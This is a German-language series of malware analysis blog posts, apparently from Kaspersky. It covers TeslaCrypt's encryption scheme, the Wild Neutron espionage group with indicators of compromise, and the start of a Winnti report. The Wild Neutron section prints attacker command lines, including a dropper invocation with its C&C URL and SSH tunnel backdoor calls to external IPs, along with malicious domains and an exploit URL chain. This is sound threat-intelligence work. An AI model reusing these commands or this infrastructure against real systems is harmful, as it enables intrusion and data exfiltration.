In der gewohnten Syntax der Sprache C lässt es sich folgendermaßen beschreiben:

Und so sieht das in einem infizierten System aus:

Verschlüsselung der Dateien

Beginnend mit Version 0.3.5 infiziert TeslaCrypt sowohl normale Speichermedien, die an das System angeschlossen sind, als auch alle verfügbaren Dateiressourcen (shares), selbst wenn sie nicht als Festplatte mit eigenem Buchstaben installiert sind. Übrigens können sich einige Verschlüsselungsprogramme einer solchen Funktionalität rühmen.

Jede Datei wird mit dem Algorithmus AES-256-CBC mit dem Schlüssel session_priv verschlüsselt. Die chiffrierte Datei erhält die zusätzliche Erweiterung “.zzz”. Am Anfang der Datei wird eine Dienststruktur platziert, darauf folgt der verschlüsselte Inhalt. Das Format der Struktur:

Dieselbe Struktur in der Syntax der Sprache C:

Entschlüsselung der Dateien

Die Autoren von TeslaCrypt 2.0.0 haben die Funktion zur Dechiffrierung der Dateien komplett aus dem Schädling entfernt, die in den vorhergehenden Versionen noch vorhanden war. Ausgehend von der Analyse des oben vorgestellten kryptografischen Schemas, sehen wir folgende Algorithmen zur Entschlüsselung der Dateien:

  1. wenn master_btc_priv bekannt ist, muss:

    • aus der verschlüsselten Datei session_pub ausgelesen werden;
    • session_ecdh_secret = ECDH(session_pub, master_btc_priv) berechnet werden;
    • session_ecdh_secret_mul aus der verschlüsselten Datei gelesen werden;
    • session_priv = session_ecdh_secret_mul / session_ecdh_secret berechnet werden;
    • die Datei mit dem Schlüssel session_priv dechiffriert werden.
  2. Gibt es keine master_btc_priv, doch malware_priv ist bekannt (ist nur den Cyberkriminellen bekannt, die im Körper des Trojaners entsprechend malware_pub platziert haben), muss/müssen:

    • Aus der Registry oder aus der verschlüsselten Datei master_btc_pub ausgelesen werden;
    • master_ecdh_secret = ECDH(master_btc_pub, malware_priv) berechnet werden;
    • aus der verschlüsselten Datei master_ecdh_secret_mul ausgelesen werden;
    • master_btc_priv = master_ecdh_secret_mul / master_ecdh_secret berechnet werden;
    • mit dem Wissen von master_btc_priv die Schritte aus Punkt eins durchgeführt werden.

Um das Geschehen vollständig zu verstehen, ist es wünschenswert, sich mit dem Diffie-Hellman-Algorithmus vertraut zu machen und seiner Version für die elliptische Kurve, ECDH, zum Beispiel hier.

Weitere Besonderheiten

Umgehung der Erkennung

Im Trojaner wird eine Technik zur Umgehung der Erkennung benutzt, die auf der Anwendung von COM-Objekten basiert. Wir entdeckten sie zum ersten Mal in TeslaCrypt Version 0.4.0, doch seither war sie geringfügigen Veränderungen unterworfen. Der von einem Sample der Version 2.0.0 generierte Pseudocode sieht folgendermaßen aus:

Kommunikation mit dem Steuerungsserver

Das Sample des Trojaners enthält eine statische Liste mit den Adressen der C&C. Die Server selbst befinden sich im Netz Tor, doch die Kommunikation wird über das gewöhnliche web mit Hilfe von tor2web-Diensten umgesetzt.

Bis zu TeslaCrypt der Version 0.4.1 wurden Anfragen an den Server in offener Form verschickt, in den folgenden Versionen wurden sie mit dem Algorithmus AES-256-CBC verschlüsselt; als Schlüssel wird die SHA256 von einer statischen Zeile aus dem Körper des Schädlings genommen.

Die Bildung der HTTP-Anfrage, die vom Trojaner bei der Infektion des Systems versendet wird, ist auf dem Screenshot des Pseudocodes dargestellt.

Verbreitung

Es wurde beobachtet, dass die Schädlinge aus der Familie TeslaCrypt mit Hilfe der Exploit-Packs Angler, Sweet Orange und Nuclear in Umlauf gebracht werden. Bei diesem Verbreitungsschema geht das Opfer auf eine infizierte Websites und der Schadcode des Exploits, das eine Sicherheitslücke im Browser ausnutzt, (am häufigsten solche in Plugins), installiert im System die eigentliche Ziel-Malware.

Geografische Verteilung der von Schädlingen der Familie TeslaCrypt angegriffenen Anwender

Empfehlungen

Zum Schutz ihrer Daten vor Verschlüsselungsprogrammen empfehlen wir, Sicherheitskopien aller wichtigen Dateien zu erstellen. Die Kopien sollten regelmäßig gemacht und auf Datenträgern gespeichert werden, die nicht zum Schreiben zur Verfügung stehen, außer direkt beim Erstellen der Sicherheitskopie. Für Heimanwender bedeutet das also, dass sie die Kopie auf einer externen Festplatte speichern, die sofort nach Fertigstellung des Backups physisch vom Rechner getrennt wird.

Von immenser Wichtigkeit ist es zudem, die auf dem System laufende Software rechtzeitig zu aktualisieren (insbesondere Plugins für den Browser und den Browser selbst), da die Hersteller ständig neu entdeckte Sicherheitslücken schließen, die von Cyberkriminellen ausgenutzt werden könnten.

Wenn es einem Schädling trotzdem einmal gelingen sollte, ins System einzudringen, so hilft ein Antiviren-Produkt mit aktuellen Datenbanken und aktivierten Schutzmodulen, ihn zu stoppen. Das betrifft besonders das proaktive Schutzmodul, das im Fall von 0-Day-Bedrohungen die letzte Verteidigungslinie darstellt.


Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück


  Global Research and Analysis Team of Kaspersky Lab       13 Juli 2015 | 19:15  MSK

Ihr Kommentar  

Indicators of Compromise (IOC)

Gestohlenes Acer-Zertifikat und unbekanntes Flash Player-Exploit in Angriffen eingesetzt

Ein mächtiger Bedrohungsakteur, bekannt als “Wild Neutron” (alias “Jripbot” oder “Morpho“) ist spätestens seit dem Jahr 2011 aktiv und hat mehrere Jahre lang prominente Unternehmen infiziert, wobei er eine Kombination von Exploits, Wasserlöchern und Plattform übergreifender Malware verwendete.

Bei der jüngsten Angriffswelle im Jahr 2015 wird ein gestohlenes, Code signierendes Zertifikat eingesetzt, das dem taiwanesischen Elektronikhersteller Acer gehört, sowie ein unbekanntes Flash Player-Exploit.

Wild Neutron erregte im Jahr 2013 allgemeine Aufmerksamkeit, als der Bedrohungsakteur erfolgreich so bekannte Unternehmen wie Apple, Facebook, Twitter und Microsoft angriff. Diese Attacken machten sich eine Java Zero-Day-Schwachstelle zunutze und setzten gehackte Foren als Wasserlöcher ein. Über die Vorfälle im Jahr 2013 wurde ausführlich in den Massenmedien berichtet und in der Folge verschwand der Bedrohungsakteur für fast ein Jahr in der Versenkung.

Im Spätjahr 2013 und zu Beginn des Jahres 2014 setzten die Attacken erneut ein und dauern auch im Jahr 2015 noch an. Zu den Zielen dieser neuen Angriffswelle gehören:

  • Anwaltskanzleien
  • Bitcoin-Unternehmen
  • Investmentfirmen
  • Große Unternehmensgruppen, die meist auf dem Markt mit Fusionen und Übernahmen (M&A) tätig sind
  • IT-Unternehmen
  • Firmen aus dem Gesundheitswesen
  • Immobilienfirmen
  • Individuelle Anwender

Der Fokus dieser Attacken lässt vermuten, dass es sich nicht um einen Akteur handelt, der von einem Nationalstaat beauftragt wurde. Doch der Einsatz von Zero-Days und von Plattform übergreifender Malware sowie anderer Techniken legt den Schluss nahe, dass wir es hier mit einer mächtigen Größe zu tun haben, die Spionage betreibt, und zwar vermutlich aus wirtschaftlichen Gründen.

Ältere Kampagnen (2013)

Im Zuge der Attacken im Jahr 2013 hat der Wild Neutron Akteur erfolgreich die Website www.iphonedevsdk[.]com – ein Forum für iPhone-Entwickler – kompromittiert und sich diese zunutze gemacht.

Die Angreifer schleusten ein Script in das Forum ein, das die Besucher auf eine andere Website umleitete (min.liveanalytics[.]org – aktuell von Kaspersky Lab auf einen SINKHOLE-Server umgeleitet), die ein Java-Zero-Day-Exploit beherbergte. Eine ähnliche Attacke wurde in einem anderen Forum beobachtet, dieses Mal eins für Linux-Entwickler: fedoraforum[.]org. Eine detaillierte Analyse der Attacken von 2013 finden Sie in Eric Romangs Blog.

Hier einige weitere von der Wild Neutron-Gruppe kompromittierte und durch Berichte des Kaspersky Security Networks identifizierte Foren:

  • expatforum.com
  • mygsmindia.com
  • forum.samdroid.net
  • emiratesmac.com
  • forums.kyngdvb.com
  • community.flexispy.com
  • ansar1.info

Insbesondere zwei stechen hervor, und zwar: “community.flexispy[.]com” und “ansar1[.]info“. Das erste ist eine von Flexispy unterhaltene Community, ein Unternehmen, das Spionagesoftware für mobile Geräte vertreibt. Das zweite ist ein Jihadistenforum, das aktuell geschlossen ist.

ansar1[.]info wurde 2013 von Wild Neutron kompromittiert

Im Jahr 2013 benutzten die Angreifer außerdem eine Mac OS X-Backdoor, die unter der Bezeichnung OSX/Pintsized bekannt ist. Auch das ist in Einzelheiten in Eric Romangs hervorragendem Blog beschrieben. Dieselbe Backdoor, kompiliert für Win32, wird noch immer in den aktuellen Angriffen verwendet.

Zu den prominentesten Opfern der 2013er-Attacken gehörten Twitter, Facebook, Apple und Microsoft. Über diese Vorfälle wurde ausführlich in der Presse berichtet und einige der betroffenen Unternehmen haben sich selbst dazu geäußert (siehe die Erklärung von Facebook).

Das Attackieren großer und größter IT-Unternehmen wie Facebook, Twitter, Apple und Microsoft ist zwar ungewöhnlich, aber auch nicht einmalig. Das Fehlen von Opfern aus anderen Bereichen, wie z.B. aus diplomatischen oder staatlichen Institutionen, ist jedoch ziemlich ungewöhnlich. Wir vermuten daher, dass wir es nicht mit Angriffen zu tun haben, die von Nationalstaaten in Auftrag gegeben wurden.

Technische Analyse

Das von der Wild Neutron-Gruppe verwendete Malwarepaket besteht aus verschiedenen Komponentengruppen:

  • Ein Haupt-Backdoor-Modul, das die Erstkommunikation mit dem C&C-Server initiiert;
  • mehrere Informationen sammelnde Module;
  • Ausnutzungs-Tools
  • SSH-basierte Ausschleusungs-Tools;
  • Zwischenlader und Dropper, die die Payloads entschlüsseln und ausführen.

Auch wenn sie maßgeschneidert sind, scheinen einige der Module zu einem großen Teil auf Open-Source-Tools zu basieren (d.h. der Passwort-Dumper ähnelt dem Code von Mimikatz und Pass-The-Hash Toolkit) und auf kommerzieller Malware (das HTTPS-Proxy-Modul ist mit dem von Hesperbot verwendeten praktisch identisch).

Die gesamte C&C-Kommunikation ist mit einem maßgefertigten Protokoll verschlüsselt. Die abgeworfenen ausführbaren Dateien und die hart codierten Strings sind normalerweise mit XOR obfuskiert (abhängig von der Bot-Version). Das Haupt-Backdoor-Modul umfasst eine Reihe von Umgehungstechniken, die Sandboxes und Emulations-Engines aufspüren und deaktivieren sollen.

Ausnutzung – 2015

Der Erstinfektionsvektor der Attacken von 2014-2015 ist noch immer unbekannt, auch wenn es klare Hinweise darauf gibt, dass die Opfer von einem Kit ausgenutzt werden, das ein unbekanntes Flash Player-Exploit verwendet.

In einem der Angriffe wurde die folgende Ausnutzungsfolge beobachtet:

Sitehxxp://cryptomag.mediasource.ch/
Pfade/favicon.ico
/msie9html5.jpg
/loader-large.gif
/bootstrap.min.css
/stats.js?d=1434374526478
/autoload.js?styleid=20&langid=5&sid=883f2efa&d=1434374526
/banner.html?styleid=19&langid=23&sid=883f2efa&d=1434374526
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533
/883f2efa/pzixfgne?styleid=5&langid=25&sid=883f2efa&d=1434374533
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533/
/background.jpg

Die Subdomain cryptomag.mediasource[.]ch scheint für diese Attacke erstellt worden zu sein; sie verwies auf eine IP-Adresse, die mit anderen C&Cs von Wild Neutron in Verbindung gebracht wird, welche unten stehend rot markiert sind:

Hosts, die nach 66.55.133[.]89 auflösen

Während app.cloudprotect[.]eu und ssl.cloudprotect[.]eu zwei bekannte Wild Neutron C&Cs sind, scheint cryptomag.mediasource[.]ch zu Ausnutzungszwecken auf diese IP verwiesen zu haben. Oben ist noch eine andere verdächtige Domain aufgeführt, und zwar secure.pdf-info[.]com. Wir haben bisher noch keine Attacken gesehen, die mit diesem Hostnamen in Verbindung stehen, doch das Namensmuster weist darauf hin, dass sie ebenfalls schädlich ist.

In einer anderen Attacke haben wir eine ähnliche Ausnutzungsfolge beobachten können, die allerdings auf einer anderen Website gehostet wurde, und zwar auf hxxp://find.a-job.today/.

In beiden Fällen surfen die Besucher auf die Website oder werden über ein gefälschtes Online-Stellenangebot dorthin geleitet. Von dort aus erscheint in beiden Fällen “autoload.js”, das wiederum zu einer anderen willkürlich benannten HTML-Datei führt, die schließlich eine willkürlich benannte SWF-Datei lädt.

Während die Gruppe im Jahr 2013 Wasserloch-Angriffe durchführte, ist noch immer unklar, wie die Opfer in den neuen Attacken der Jahre 2014/2015 auf die Exploitation-Kits umgeleitet werden. Anstelle von Flash-Exploits nutzten älterer Wild Neutron-Schemata und Wasserlöcher etwas, das Ende 2012 und Anfang 2013 ein Java-Zero-Day war und die Produkte von Kaspersky Lab als Exploit.Java.CVE-2012-3213.b detektierten.

Der Haupt-Malware-Dropper

Die Funktionalität des Hauptdroppers ist relativ simpel: Er entschlüsselt die ausführbare Backdoor-Datei (als Ressource gespeichert und mit einem einfachen XOR 0x66 verschlüsselt), schreibt sie in einen spezifischen Pfad und führt sie dann mit den Parametern aus, die in den Code des Dropperkörpers geschrieben sind. Einer der Parameter ist die URL des C&C-Servers, während andere verschiedene Konfigurationsoptionen für die Bots beinhalten.

Beispiele für vom Dropper verwendete Parameter:

igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu

Nach Ausführung der Haupt-Backdoor wird der Dropper sicher gelöscht, indem sein Inhalt mehrmals mit willkürlichen Zahlen überschrieben wird, bevor die Datei umbenannt und entfernt wird.

Die Haupt-Backdoor (alias “Jripbot”)

Diese Binärdatei wird mit der URL-Adresse des C&C-Servers als ein Parameter ausgeführt; sie kann zudem eine optionale Bot-Konfiguration erhalten. Diese Information wird dann doppelt verschlüsselt – zuerst mit RC4 und dann mit der Windows-Funktion CryptProtectData – und in der Registry gespeichert.

Bevor irgendeine andere Aktivität verrichtet wird, führt die Malware zunächst ihren Stalling-Code aus (der dazu dient, die Emulatoren auszutricksen), führt daraufhin verschiedene Anti-Sandboxing-Checks durch und tritt dann - wenn irgendwelche unerwünschte Software in dem System gefunden wird - in eine Endlosschleife ein.

Andernfalls überprüft die Schadsoftware:

  • die Betriebssystemversion,
  • ob das Programm unter WOW64 läuft,
  • ob der aktuelle Nutzer über Administratorenrechte verfügt,
  • welche Sicherheitsfeatures von Windows aktiviert sind,
  • Nutzer- und Computername,
  • Servername und LAN-Gruppe,
  • Informationen über die logischen Laufwerke,
  • Betriebszeit und Inaktivitätszeit des System (uptime und idle time),
  • die standardmäßigen Webbrowser,
  • die Proxy-Einstellungen.

Auf der Grundlage einiger dieser Informationen erzeugt die Malware eine einzigartige ID für das Opfer und startet die C&C-Kommunikation, indem sie den ID-Wert sendet und Befehle erwartet.

Die Konfigurationsoptionen der Backdoor können die Proxyserver-Adresse und Anmeldedaten, Sleeptime-/Verzögerungswerte und Verbindungstyp enthalten, aber am interessantesten ist die Option resolv=[url] option. Ist diese Option aktiviert, generiert die Malware einen Domainnamen, der aus dem Computernamen, einer einmaligen ID und der URL besteht, die mit dieser Option durchlaufen wird; dann versucht sie, die IP-Adresse dieser Domain aufzulösen. Wir vermuten, dass die Angreifer diese Methode verwenden, um die erzeugte UID an den C&C-Server zu senden.

Die Befehle vom C&C können den Bot zum Ausführen der folgenden Aktionen veranlassen:

  • Das aktuelle Verzeichnis in das angefragte umändern;
  • einen willkürlichen Befehl in der Befehlszeile ausführen;
  • den autorun-Wert für sich selbst in der Registry einstellen;
  • den autorun-Wert für sich selbst in der Registry löschen;
  • eine angefragte Datei schreddern (den Dateiinhalt mit willkürlichen Zahlen überschreiben, den Dateinamen mit Nullen überschreiben und sie dann löschen);
  • eine Datei aus dem Internet herunterladen und auf der Festplatte speichern (optional verschlüsselt);
  • zusätzliche Malware-Plugins installieren oder deinstallieren;
  • Informationen sammeln und senden;
  • Laufwerke durchzählen;
  • einen Sleeptime-Wert einstellen;
  • die Konfiguration aktualisieren;
  • sich selbst aktualisieren
  • beenden.

Ältere Versionen dieser Backdoor, die in den Attacken im Jahr 2013 verwendet wurden, verfügten über einige zusätzliche Funktionen:

  • Sammeln von Passwörtern;
  • Scannen von Ports;
  • Erstellen von Screenshots;
  • Senden von Dateien zum C&C;
  • Reverse Shell.

Diese Funktionen wurden aus den neueren Versionen der Backdoor, die in den jüngsten Attacken eingesetzt werden, entfernt. Stattdessen führten die Entwickler der Schadsoftware einen Plugin-Mechanismus ein und setzen verschiedene Tools für verschiedene Aufgaben ein. Das ist ein deutlicher Schritt in Richtung einer flexibleren modularen Architektur.

Hinsichtlich ihrer Funktionalität unterscheidet sich die Haupt-Backdoor nicht von vielen anderen Remote Access Tools (RATs - Fernwartungssoftware). Ein wirklich hervorstechendes Merkmal dieser Gruppe ist die Vorsicht und die Sorgfalt, mit der die Angreifer die Adresse des C&C-Servers verbergen, indem sie sie mit maschinenabhängigen Informationen in der Registry verschlüsselt. Ebenfalls bemerkenswert ist die Wiederherstellungsfähigkeit nach der Stilllegung eines C&C-Servers, indem ein dynamisch generierter Domainname kontaktiert wird, den nur die Angreifer im Voraus kennen, da er direkt mit jedem individuellen Opfer verknüpft ist.

Dem Zeitstempel der Samples zufolge stellt sich die Verteilung folgendermaßen dar:

Jede Backdoor scheint eine interne Versionsnummer zu haben, die in den jüngsten Samples zwischen 11000 und 16000 liegt. Dadurch können wir die folgende Entwicklungskarte zeichnen:

In den Attacken des Jahres 2013 verwendete Backdoors:

MD5ZeitstempelVersionDateinameGröße
1582d68144de2808b518934f0a02bfd629 Nov 201211000javacpl.exe327168
14ba21a3a0081ef60e676fd4945a8bdc30 Nov 201212000javacpl.exe329728
0fa3657af06a8cc8ef14c445acd92c0f09 Jan 201313000javacpl.exe343552

In den Attacken der Jahre 2014 und 2015 verwendete Backdoors:


MD5ZeitstempelVersionDateinameGröße
95ffe4ab4b158602917dd2a999a8caf813 Dez. 201314014LiveUpdater.exe302592
342887a7ec6b9f709adcb81fef0d30a320 Juni 201415013FlashUtil.exe302592
dee8297785b70f490cc00c0763e31b6902 Aug. 2013
(eventuell gefälscht)
16010IgfxUpt.exe291328
f0fff29391e7c2e7b13eb4a806276a8427 Okt. 201416017RtlUpd.exe253952

Die Installer haben ebenfalls Versionsnummern, die auf die folgende Entwicklung schließen lassen:

MD5ZeitstempelVersion
1f5f5db7b15fe672e8db091d9a291df016. Dez. 20111.4.1
48319e9166cda8f605f9dce36f115bc828. Sep. 20121.5.0
088472f712d1491783bbad87bcc17c4812. Apr. 20131.6.3
ee24a7ad8d137e54b854095188de0bbf07. Jan. 20141.6.4

Seitwärtsbewegung

Nach Installation der Haupt-Backdoor und Aufbau der Erstkommunikation mit dem C2 setzen die Angreifer ein breites Spektrum von unterschiedlichen Tools ein, um sensitive Daten zu entnehmen und die Kontrolle über den Rechner des Opfers zu erlangen. Zu diesen Tools gehören ein Passwort sammelnder Trojaner, eine Reverse-Shell-Backdoor und maßgeschneiderte Implementierungen von OpenSSH, WMIC und SMB. Manchmal laden sie lediglich eine einfache Perl Reverse-Shell ab und setzen verschiedene Methoden ein, um Anmeldedaten von einer Auswahl von Rechnern zu sammeln, Privilegien zu erhöhen und von dort aus ins Netzwerk auszuschwärmen. Neben diesen Tools gibt es außerdem eine Reihe von kleinen Modulen mit unterschiedlichster Funktionalität – von Loadern und Konfigurationstools bis hin zu Dateischreddern und Netzwerk-Proxys.

Erwähnenswert ist auch, dass dieser Bedrohungsakteur in hohem Maße auf schon existierendem Code basiert und öffentlich verfügbare Open Source-Apps nutzt sowie Metasploit-Tools und durchgesickerten Malware-Quellcode, um sich damit seine eigenen Tools zu basteln. Einige dieser Tools wurden geschaffen, um unter Cygwin zu laufen und sich mit der Cygwin API DLL zu vereinigen. Das könnte darauf hindeuten, dass sich die Angreifer wohler fühlen, wenn sie in einer Linux-artigen Umgebung arbeiten.

SSH Tunnel-Backdoor

Im Laufe der Attacken 2014/2015 beobachteten wir, dass die Angreifer maßgeschneiderte, OpenSSH-basierte Win32 Tunnel-Backdoors bereitstellten, die verwendet werden, um große Datenmengen zuverlässig abzutransportieren. Diese Tunnel-Backdoors sind als “updt.dat” geschrieben und werden mit zwei Parametern ausgeführt, -z and -p. Diese Parameter bestimmen, mit welcher IP eine Verbindung hergestellt werden soll, sowie den Port. Anstelle von Port Nummer 443, ist das eine SSH-Verbindung:

  • /d /u /c updt.dat -z 185.10.58.181 -p 443
  • /d /u /c updt.dat -z 46.183.217.132 -p 443
  • /d /u /c updt.dat -z 217.23.6.13 -p 443

Zur Authentifikation enthält die SSH-Tunnel-Backdoor einen hart codierten privaten RSA-Schlüssel.

Das gestohlene Zertifikat

Im Zuge der Angriffe im laufenden Jahr 2015 benutzte Wild Neutron einen Dropper, der mit einem gestohlenen, aber noch immer gültigen Zertifikat von Acer Incorporated signiert war.

Acer-Signatur in Wild Neutron-Dropper

Das missbrauchte Zertifikat hat die folgenden Eigenschaften:

Seriennummer: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80

Daumenabdruck: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07

Der Dropper (dbb0ea0436f70f2a178a60c4d8b791b3) wurde anscheinend am 15. Juni 2015 signiert. Er entlädt eine Jripbot-Backdoor als “IgfxUpt.exe” und konfiguriert sie für die Verwendung des C&C “app.cloudprotect[.]eu”.

Wir haben mit Symantec, Verisign und Acer zusammengearbeitet, um das kompromittierte Zertifikat zurückzurufen.

Opfer und Statistiken

Die Attacken der Wild Neutron-Gruppe scheinen hochgradig zielgerichtet zu sein. Im Laufe unserer Untersuchung konnten wir verschiedene Opfer in 11 Ländern der Welt identifizieren:

  • Frankreich
  • Russland
  • Schweiz
  • Deutschland
  • Österreich
  • Palästina
  • Slowenien
  • Kasachstan
  • Vereinigte Arabische Emirate
  • Algerien
  • USA

Die Opfer der Versionen aus den Jahren 2014-2015 stammten grundsätzlich aus den Bereichen IT und Immobilien/Investment, und in beiden Fällen wurde eine kleine Zahl von Computern innerhalb der Organisationen infiziert. Die Angreifer scheinen das Malwareimplantat aktualisiert zu haben und einige zusätzliche Tools bereitzustellen, doch wir konnten in diesen Fällen keine ernsthafte Seitwärtsbewegung beobachten.

Attribution

Da der Bedrohungsakteur verschiedene Unternehmen angreift, die nicht direkt mit Regierungen in Verbindung stehen, glauben wir, dass es sich nicht um einen staatlich geförderten APT handelt. Die Angreifer haben außerdem ein Interesse an Investmentfirmen gezeigt, was vermuten lässt, dass sie über das entsprechende Wissen und die Fähigkeiten verfügen, um solche Informationen auf dem Markt auszunutzen und sie in einen finanziellen Vorteil zu verkehren.

In einigen der Samples enthält die verschlüsselte Konfiguration eine Zeile in rumänischer Sprache, die verwendet wird, um das Ende der C&C-Kommunikation zu markieren:

Interessanterweise bedeutet “La revedere” auf Rumänisch „auf Wiedersehen“. Darüber hinaus haben wir einen weiteren nicht-englischen String gefunden, und zwar die lateinische Transkription des russischen Worts Успешно (“uspeshno” -> “erfolgreich”). Dieser String wird nach Ausführung eines C2-Befehls in eine Pipe geschrieben.

Eins der Samples hat den internen Namen “WinRAT-Win32-Release.exe”. Das hat vermutlich zu bedeuten, dass die Autoren ihre Malware “WinRAT” nennen.

Weitere Informationen über die Attribution von Wild Neutron sind für Kunden von Kaspersky Intelligence Services verfügbar. Kontakt: intelreports@kaspersky.com

Fazit

Verglichen mit anderen APT-Gruppen ist Wild Neutron eine der ungewöhnlichsten Bedrohungsakteure, die wir je analysiert und beobachtet haben. Seit 2011 aktiv, hat die Gruppe mindestens ein Zero-Day-Exploit verwendet sowie maßgeschneiderte Malware und Tools, und hat es geschafft, seine Daten so weit unter Verschluss zu halten, dass alle Versuche einer Attribution mehr oder minder gescheitert sind. Die Attacken der Gruppe auf große IT-Unternehmen, Spyware-Entwickler (FlexiSPY), Jihadisten-Foren (the “Ansar Al-Mujahideen English Forum”) und Bitcoin-Unternehmen weisen auf eine flexible und dennoch ungewöhnliche Denkweise und ebensolche Interessen hin.

Hier einige charakteristische Merkmale der Gruppe:

  • Verwendung von Open-Source-Tools und durchgesickerten Quellcodes anderer Malware;
  • Verwendung eines gestohlenen Acer-Zertifikats zum Signieren der Malware;
  • Verwendung eines Plattform übergreifenden Zero-Day-Exploit (Java und Flash), gefolgt von einer Plattform übergreifenden Reverse-Shell-Payload (Perl) für das Ersteindringen ins System;
  • Verwendung von *NIX-Code der über Cygwin in Windows portiert wird;
  • massiver Gebrauch von SSH für das Herausschleusen, ein gängiges *NIX-Administrationstool;
  • Verwendung von CryptProtectData API, um die URL des C&C geheim zu halten;
  • ein einfaches Befehlszeilen-Interface, das um alle Malware-Komponenten herumgebaut ist, unter Verwendung von benannten Pipes für die Kommunikation zwischen den Modulen;
  • die Hilfstools sind in C programmiert und die meisten von ihnen enthalten eine integrierte Hilfe, die mit Ausführung der Binärdatei mit einem “–pleh”-Parameter ausgedruckt werden kann.

Wir beobachten die Wild Neutron-Gruppe auch weiterhin, die mit Stand vom Juni 2015 noch immer aktiv ist.

Die Produkte von Kaspersky Lab detektieren die in den Angriffen verwendeten Schadprogramme als:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*,
HEUR:Trojan.Win32.Generic

Erfahren Sie hier mehr darüber, wie die Produkte von Kaspersky Lab dabei helfen, Sie vor dem Bedrohungsakteur Wild Neutron zu schützen:
Wild Neutron in freier Wildbahn: Vielleicht sind Sie die nächste Beute

Indicators of Compromise (IOCs)

Bekannte schädliche Hostnamen und Domains:

ddosprotected.eu
updatesoft.eu
app.cloudprotect.eu
fw.ddosprotected.eu
logs.cloudprotect.eu
ssl.cloudprotect.eu
ssl.updatesoft.eu
adb.strangled.net
digitalinsight-ltd.com
ads.digitalinsight-ltd.com
cache.cloudbox-storage.com
cloudbox-storage.com
clust12-akmai.net
corp-aapl.com
fb.clust12-akmai.net
fbcbn.net
img.digitalinsight-ltd.com
jdk-update.com
liveanalytics.org
min.liveanalytics.org
pop.digitalinsight-ltd.com
ww1.jdk-update.com
find.a-job.today
cryptomag.mediasource.ch

Bekannte schädliche IPs:

185.10.58.181
46.183.217.132
64.187.225.231
62.113.238.104
66.55.133.89
217.23.6.13

Bekannte Dateinamen:

%APPDATA%\Roaming\FlashUtil.exe
%APPDATA%\Roaming\Acer\LiveUpdater.exe
%APPDATA%\Roaming\Realtek\RtlUpd.exe
%ProgramData%\Realtek\RtlUpd.exe
%APPDATA%\Roaming\sqlite3.dll (UPX packed)
%WINDIR%\winsession.dll
%APPDATA%\appdata\local\temp\teamviewer\version9\update.exe
%SYSTEMROOT%\temp\_dbg.tmp
%SYSTEMROOT%\temp\ok.tmp
C:\windows\temp\debug.txt
C:\windows\syswow64\mshtaex.exe
%SYSROOT%\System32\mshtaex.exe
%SYSROOT%\System32\wdigestEx.dll
%SYSROOT%\System32\dpcore16t.dll
%SYSROOT%\System32\iastor32.exe
%SYSROOT%\System32\mspool.dll
%SYSROOT%\System32\msvcse.exe
%SYSROOT%\System32\mspool.exe
C:\Program Files (x86)\LNVSuite\LnrAuth.dll
C:\Program Files (x86)\LNVSuite\LnrAuthSvc.dll
C:\Program Files (x86)\LNVSuite\LnrUpdt.exe
C:\Program Files (x86)\LNVSuite\LnrUpdtP.exe
DF39527~.tmp

Benannte Pipes:

\\.\pipe\winsession
\\.\pipe\lsassw

Events & Mutexes:

Global\LnrRTPDispatchEvents
_Winlogon_TCP_Service


Spiele sind out: Winnti greift nun Pharma-Unternehmen an


  Dmitry Tarakanov        29 Juni 2015 | 14:54  MSK

Ihr Kommentar  

Lange Zeit wurde die Winnti-Gruppe für einen chinesischen Bedrohungsakteur gehalten, der in erster Linie Game-Unternehmen angreift. Kürzlich haben wir Informationen erhalten, die darauf hinweisen, dass das Zielspektrum ausgeweitet und nicht mehr ausschließlich auf die Unterhaltungsindustrie beschränkt sein könnte. Wir beobachten zwar in der Tat pausenlos Samples der Winnti-Malware, doch bisher konnten wir nicht einen handfesten Anhaltspunkt dafür finden, dass auch andere Branchen angegriffen werden. Doch auch als AV-Anbieter erstreckt sich unser Sichtfeld nicht auf jedes Unternehmen in der Welt (jedenfalls noch nicht ;)) und das Kaspersky Security Network (KSN) hat keine Attacken aufgedeckt, die sich gegen andere Unternehmen als solche aus der Game-Industrie richteten. Manchmal gehörten die angegriffenen Konzerne auch der Telekommunikationsbranche an, oder besser noch, es waren große Holdinggesellschaften, aber immer hatte mindestens einer ihrer Geschäftszweige auf irgendeine Weise mit der Produktion oder mit dem Vertrieb von Computerspielen zu tun.

Im April veröffentlichte Novetta seinen hervorragenden Bericht über die Winnti-Malware, die in den Operationen der Axiom-Gruppe aufgetaucht war. Die Axiom-Gruppe wurde als ein fortschrittlicher chinesischer Bedrohungsakteur präsentiert, der Cyberspionage-Attacken gegen ein weites Spektrum unterschiedlicher Branchen durchführt. Für uns war der Novetta-Report eine weitere Quelle, die belegt, das Winnti bereits jenseits von Online-Games operiert. Eins der kürzlich von uns gefundenen Winnti-Samples scheint diese Annahme ebenfalls zu bestätigen.

Das neue Sample gehört zu einer der Winnti-Versionen, die im Bericht von Novetta beschrieben werden – Winnti 3.0. Das ist eine der Dynamic Link Libraries, aus der sich die RAT-Plattform (Remote Access Trojan) zusammensetzt – die Worker-dll (die im Wesentlichen die RAT DLL ist) mit dem internen Namen w64.dll und den exportierten Funktionen work_end und work_start. Da diese Komponente wie gewöhnlich auf der Festplatte gespeichert ist, wobei die Strings und viele andere Daten in dem PE-Header entfernt/auf Null gestellt wurden, ist es unmöglich das Kompilierungsdatum dieser DLL wiederherzustellen. Aber diese Bibliothek enthält zwei Treiber, die am 22. August und 04. September 2014 kompiliert wurden. Das Sample hat einen verschlüsselten Konfigurationsblock, der im Overlay platziert wurde. Dieser Block kann einen Tag für das Sample enthalten – normalerweise ist das eine ID für die Kampagne oder das Opfer. In diesem Fall haben die Betreiber einen solchen Tag in der Konfiguration platziert und es hat sich herausgestellt, dass es der Name eines sehr bekannten internationalen Pharma-Unternehmens mit Sitz in Europa ist:

Abb. 1: Konfigurationsblock

